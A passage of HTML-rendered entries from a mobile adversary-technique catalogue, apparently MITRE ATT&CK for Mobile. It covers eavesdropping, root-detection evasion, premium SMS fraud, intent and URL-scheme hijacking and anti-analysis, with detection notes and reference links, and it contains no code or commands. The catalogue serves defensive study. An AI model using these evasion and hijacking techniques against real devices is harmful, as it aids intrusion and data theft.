<caption class="title">Table 1342. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1057">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1057</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html">http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://srlabs.de/bites/rooting-sim-cards/">https://srlabs.de/bites/rooting-sim-cards/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_eavesdrop_on_insecure_network_communication_mob_t1042"><a class="anchor" href="#_eavesdrop_on_insecure_network_communication_mob_t1042"></a><a class="link" href="#_eavesdrop_on_insecure_network_communication_mob_t1042">Eavesdrop on Insecure Network Communication - MOB-T1042</a></h3>
<div class="paragraph">
<p>If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication. For example, He et al. (Citation: mHealth) describe numerous healthcare-related applications that did not properly protect network communication.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1343. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1042">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1042</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps">https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_disguise_root_jailbreak_indicators_mob_t1011"><a class="anchor" href="#_disguise_root_jailbreak_indicators_mob_t1011"></a><a class="link" href="#_disguise_root_jailbreak_indicators_mob_t1011">Disguise Root/Jailbreak Indicators - MOB-T1011</a></h3>
<div class="paragraph">
<p>An adversary could use knowledge of the techniques used by security software to evade detection. For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection as described by (Citation: Rastogi) et al. (Citation: Rastogi).</p>
</div>
<div class="literalblock">
<div class="content">
<pre>(Citation: Brodie) (Citation: Brodie) describes limitations of jailbreak/root detection mechanisms.</pre>
</div>
</div>
<div class="literalblock">
<div class="content">
<pre>(Citation: Tan) (Citation: Tan) describes his experience defeating the jailbreak detection used by the iOS version of Good for Enterprise.</pre>
</div>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1344. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1011">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1011</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html">https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://pages.cs.wisc.edu/" class="bare">http://pages.cs.wisc.edu/</a><sub>vrastogi/static/papers/rcj13b.pdf[<a href="http://pages.cs.wisc.edu/" class="bare">http://pages.cs.wisc.edu/</a></sub>vrastogi/static/papers/rcj13b.pdf]</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf">https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions">http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_device_type_discovery_mob_t1022"><a class="anchor" href="#_device_type_discovery_mob_t1022"></a><a class="link" href="#_device_type_discovery_mob_t1022">Device Type Discovery - MOB-T1022</a></h3>
<div class="paragraph">
<p>On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1345. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1022">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1022</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://zeltser.com/third-party-keyboards-security/">https://zeltser.com/third-party-keyboards-security/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_premium_sms_toll_fraud_mob_t1051"><a class="anchor" href="#_premium_sms_toll_fraud_mob_t1051"></a><a class="link" href="#_premium_sms_toll_fraud_mob_t1051">Premium SMS Toll Fraud - MOB-T1051</a></h3>
<div class="paragraph">
<p>A malicious app could use standard Android APIs to send SMS messages. SMS messages could potentially be sent to premium numbers that charge the device owner and generate revenue for an adversary, for example as described by Lookout in (Citation: Lookout-SMS).</p>
</div>
<div class="paragraph">
<p>On iOS, apps cannot send SMS messages.</p>
</div>
<div class="paragraph">
<p>On Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).</p>
</div>
<div class="paragraph">
<p>Detection: As described in Google&#8217;s Android Security 2014 Year in Review Report (Citation: AndroidSecurity2014), starting with Android 4.2 the user is prompted and must provide consent before applications can send SMS messages to premium numbers.</p>
</div>
<div class="paragraph">
<p>On Android 6.0 and up, the user can view which applications have permission to send SMS messages through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1346. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1051">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1051</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.lookout.com/blog/2013/08/02/dragon-lady/">https://blog.lookout.com/blog/2013/08/02/dragon-lady/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google%20Android%20Security%202014%20Report%20Final.pdf">https://static.googleusercontent.com/media/source.android.com/en//security/reports/Google%20Android%20Security%202014%20Report%20Final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_device_cloud_backups_mob_t1073"><a class="anchor" href="#_obtain_device_cloud_backups_mob_t1073"></a><a class="link" href="#_obtain_device_cloud_backups_mob_t1073">Obtain Device Cloud Backups - MOB-T1073</a></h3>
<div class="paragraph">
<p>An adversary who is able to obtain unauthorized access to or misuse authorized access to cloud backup services (e.g. Google&#8217;s Android backup service or Apple&#8217;s iCloud) could use that access to obtain sensitive data stored in device backups. For example, the Elcomsoft Phone Breaker product advertises the ability to retrieve iOS backup data from Apple&#8217;s iCloud (Citation: Elcomsoft-EPPB).</p>
</div>
<div class="paragraph">
<p>Detection: Google provides the ability for users to view their account activity. Apple iCloud also provides notifications to users of account activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1347. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1073">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1073</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-0.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.elcomsoft.com/eppb.html">https://www.elcomsoft.com/eppb.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_sensitive_data_in_device_logs_mob_t1016"><a class="anchor" href="#_access_sensitive_data_in_device_logs_mob_t1016"></a><a class="link" href="#_access_sensitive_data_in_device_logs_mob_t1016">Access Sensitive Data in Device Logs - MOB-T1016</a></h3>
<div class="paragraph">
<p>On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device&#8217;s system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1348. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1016">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-3.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_attack_pc_via_usb_connection_mob_t1030"><a class="anchor" href="#_attack_pc_via_usb_connection_mob_t1030"></a><a class="link" href="#_attack_pc_via_usb_connection_mob_t1030">Attack PC via USB Connection - MOB-T1030</a></h3>
<div class="paragraph">
<p>With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC. Wang and Stavrou (Citation: Wang-ExploitingUSB) and Kamkar (Citation: ArsTechnica-PoisonTap) describe this technique. This technique has been demonstrated on Android, and we are unaware of any demonstrations on iOS.</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1349. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1030">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html">https://pages.nist.gov/mobile-threat-catalogue/physical-threats/PHY-2.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://dl.acm.org/citation.cfm?id=1920314">http://dl.acm.org/citation.cfm?id=1920314</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/">http://arstechnica.com/security/2016/11/meet-poisontap-the-5-tool-that-ransacks-password-protected-computers/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_android_intent_hijacking_mob_t1019"><a class="anchor" href="#_android_intent_hijacking_mob_t1019"></a><a class="link" href="#_android_intent_hijacking_mob_t1019">Android Intent Hijacking - MOB-T1019</a></h3>
<div class="paragraph">
<p>A malicious app can register to receive intents meant for other applications and may then be able to receive sensitive values such as OAuth authorization codes as described in (Citation: IETF-PKCE).</p>
</div>
<div class="paragraph">
<p>Platforms: Android</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1350. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1019">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1019</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://tools.ietf.org/html/rfc7636">https://tools.ietf.org/html/rfc7636</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_url_scheme_hijacking_mob_t1018"><a class="anchor" href="#_url_scheme_hijacking_mob_t1018"></a><a class="link" href="#_url_scheme_hijacking_mob_t1018">URL Scheme Hijacking - MOB-T1018</a></h3>
<div class="paragraph">
<p>An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application. This technique, for example, could be used to capture OAuth authorization codes as described in (Citation: IETF-PKCE) or to phish user credentials as described in (Citation: MobileIron-XARA). Related potential security implications are described in (Citation: Dhanjani-URLScheme). FireEye researchers describe URL scheme hijacking in a blog post (Citation: FireEye-Masque2), including evidence of its use.</p>
</div>
<div class="paragraph">
<p>Platforms: iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1351. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1018">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1018</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html">https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://tools.ietf.org/html/rfc7636">https://tools.ietf.org/html/rfc7636</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures">https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html">http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/02/ios%20masque%20attackre.html">https://www.fireeye.com/blog/threat-research/2015/02/ios%20masque%20attackre.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exploit_enterprise_resources_mob_t1031"><a class="anchor" href="#_exploit_enterprise_resources_mob_t1031"></a><a class="link" href="#_exploit_enterprise_resources_mob_t1031">Exploit Enterprise Resources - MOB-T1031</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to exploit enterprise servers, workstations, or other resources over the network. This technique may take advantage of the mobile device&#8217;s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1352. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1031">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1031</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_modify_system_partition_mob_t1003"><a class="anchor" href="#_modify_system_partition_mob_t1003"></a><a class="link" href="#_modify_system_partition_mob_t1003">Modify System Partition - MOB-T1003</a></h3>
<div class="paragraph">
<p>If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.</p>
</div>
<div class="paragraph">
<p>Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.</p>
</div>
<div class="paragraph">
<p>Detection: Android devices with the Verified Boot capability (Citation: Android-VerifiedBoot) perform cryptographic checks of the integrity of the system partition.</p>
</div>
<div class="paragraph">
<p>The Android SafetyNet API&#8217;s remote attestation capability could potentially be used to identify and respond to compromised devices.</p>
</div>
<div class="paragraph">
<p>Samsung KNOX also provides a remote attestation capability on supported Samsung Android devices.</p>
</div>
<div class="paragraph">
<p>As described in the iOS Security Guide (Citation: Apple-iOSSecurityGuide), iOS devices will fail to boot or fail to allow device activation if unauthorized modifications are detected.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1353. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1003">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1003</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://source.android.com/security/verifiedboot/">https://source.android.com/security/verifiedboot/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf">https://www.apple.com/business/docs/iOS%20Security%20Guide.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_information_discovery_mob_t1029"><a class="anchor" href="#_system_information_discovery_mob_t1029"></a><a class="link" href="#_system_information_discovery_mob_t1029">System Information Discovery - MOB-T1029</a></h3>
<div class="paragraph">
<p>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, and architecture.</p>
</div>
<div class="paragraph">
<p>On Android, much of this information is programmatically accessible to applications through the android.os.Build class (Citation: Android-Build).</p>
</div>
<div class="paragraph">
<p>On iOS, techniques exist for applications to programmatically access this information, for example as described in (Citation: StackOverflow-iOSVersion).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1354. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1029">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://zeltser.com/third-party-keyboards-security/">https://zeltser.com/third-party-keyboards-security/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-on">http://stackoverflow.com/questions/7848766/how-can-we-programmatically-detect-which-ios-version-is-device-running-on</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_service_scanning_mob_t1026"><a class="anchor" href="#_network_service_scanning_mob_t1026"></a><a class="link" href="#_network_service_scanning_mob_t1026">Network Service Scanning - MOB-T1026</a></h3>
<div class="paragraph">
<p>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device&#8217;s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1355. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1026">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1026</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_call_log_mob_t1036"><a class="anchor" href="#_access_call_log_mob_t1036"></a><a class="link" href="#_access_call_log_mob_t1036">Access Call Log - MOB-T1036</a></h3>
<div class="paragraph">
<p>On Android, an adversary could call standard operating system APIs from a malicious application to gather call log data, or with escalated privileges could directly access files containing call log data.</p>
</div>
<div class="paragraph">
<p>On iOS, applications do not have access to the call log, so privilege escalation would be required in order to access the data.</p>
</div>
<div class="paragraph">
<p>Detection: On Android 6.0 and up, the user can view which applications have permission to access call log information through the device settings screen, and the user can choose to revoke the permissions.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1356. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1036">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1036</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_detect_app_analysis_environment_mob_t1043"><a class="anchor" href="#_detect_app_analysis_environment_mob_t1043"></a><a class="link" href="#_detect_app_analysis_environment_mob_t1043">Detect App Analysis Environment - MOB-T1043</a></h3>
<div class="paragraph">
<p>An adversary could evade app vetting techniques by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis.</p>
</div>
<div class="paragraph">
<p>Discussion of general Android anti-analysis techniques can be found in (Citation: Petsas). Discussion of Google Play Store-specific anti-analysis techniques can be found in (Citation: Oberheide-Bouncer), (Citation: Percoco-Bouncer).</p>
</div>
<div class="literalblock">
<div class="content">
<pre>(Citation: Wang) presents a discussion of iOS anti-analysis techniques.</pre>
</div>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1357. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1043">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1043</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html">https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html">https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://dl.acm.org/citation.cfm?id=2592796">http://dl.acm.org/citation.cfm?id=2592796</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://jon.oberheide.org/files/summercon12-bouncer.pdf">https://jon.oberheide.org/files/summercon12-bouncer.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH%20US%2012%20Percoco%20Adventures%20in%20Bouncerland%20WP.pdf">https://media.blackhat.com/bh-us-12/Briefings/Percoco/BH%20US%2012%20Percoco%20Adventures%20in%20Bouncerland%20WP.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang%20tielei">https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang%20tielei</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_malicious_web_content_mob_t1059"><a class="anchor" href="#_malicious_web_content_mob_t1059"></a><a class="link" href="#_malicious_web_content_mob_t1059">Malicious Web Content - MOB-T1059</a></h3>
<div class="paragraph">
<p>Content of a web page could be designed to exploit vulnerabilities in a web browser running on the mobile device.</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1358. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/mobile/index.php/Technique/MOB-T1059">https://attack.mitre.org/mobile/index.php/Technique/MOB-T1059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html">https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-22.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fake_developer_accounts_mob_t1045"><a class="anchor" href="#_fake_developer_accounts_mob_t1045"></a><a class="link" href="#_fake_developer_accounts_mob_t1045">Fake Developer Accounts - MOB-T1045</a></h3>
<div class="paragraph">
<p>An adversary could use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. For example, Oberheide and Miller describe use of this technique in (Citation: Oberheide-Bouncer).</p>
</div>
<div class="paragraph">
<p>Platforms: Android, iOS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1359. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
